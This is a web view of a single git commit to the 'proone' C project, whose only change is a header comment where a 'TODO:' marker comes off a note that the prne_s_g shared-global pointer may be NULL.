diff options
author | David Timber <mieabby@gmail.com> | 2020-09-03 16:30:07 +0930 |
---|---|---|
committer | David Timber <mieabby@gmail.com> | 2020-09-03 16:30:07 +0930 |
commit | 1aa37a98e47335e283d08a7798bd8e0d2eda7227 (patch) | |
tree | 019b3853e9e890e9ce2f4af22d99012d122a9b8d /src/proone.h | |
parent | 55f73d9c963cdd1ddda8741e178d0930b99e2eb8 (diff) |
* [proone] prne_s_g null check
Diffstat (limited to 'src/proone.h')
-rw-r--r-- | src/proone.h | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/src/proone.h b/src/proone.h index 700bd64..3906ba1 100644 --- a/src/proone.h +++ b/src/proone.h @@ -73,5 +73,5 @@ struct prne_shared_global { extern struct prne_global prne_g; -// TODO: could be NULL on some environments +// could be NULL on some environments extern struct prne_shared_global *prne_s_g; |